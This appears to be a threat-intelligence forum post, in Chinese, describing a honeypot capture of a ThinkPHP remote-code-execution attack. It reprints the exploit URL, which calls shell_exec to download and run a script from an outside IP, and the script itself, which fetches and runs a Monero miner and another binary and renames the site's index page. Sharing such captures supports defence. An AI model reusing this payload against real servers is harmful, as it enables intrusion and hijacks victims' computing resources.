蜜罐捕获
利用ThinkPHP漏洞下载并执行挖矿脚本
匿名用户 2018-12-27 14:24:51 1613人浏览

利用url如下:

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;curl%20http://205.185.113.123/ex.sh%20-O;chmod%20777%20ex.sh;sh%20ex.sh


下载的ex.sh如下:

cd /tmp; wget http://205.185.113.123/mcoin; curl http://205.185.113.123/mcoin -O; chmod 777 mcoin; ./mcoin -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=95; rm -rf RjsWs

cd /tmp; wget http://205.185.113.123/sefa.x86; curl http://205.185.113.123/sefa.x86 -O; chmod 777 sefa.x86; ./sefa.x86 xd

cd /tmp; wget http://205.185.113.123/mcoin-ankit; curl http://205.185.113.123/mcoin-ankit -O; chmod 777 mcoin-ankit; ./mcoin-ankit -o 205.185.113.123:3333 -p x -k -a cryptonight -B --max-cpu-usage=95; rm -rf RjsWs

mv /var/www/html/index.php /var/www/html/elrekt.php

rm -rf ex.sh

威胁指标(IOC)
ip地址(1) 威胁情报数目 开放端口 所属域名 相关样本 微步标签 < 1/1 >
Hash(1) 检测结果 关联样本 微步标签 免费 全部 < 1/1 >
匿名用户 2019-01-22 21:56:10 回复
感谢分享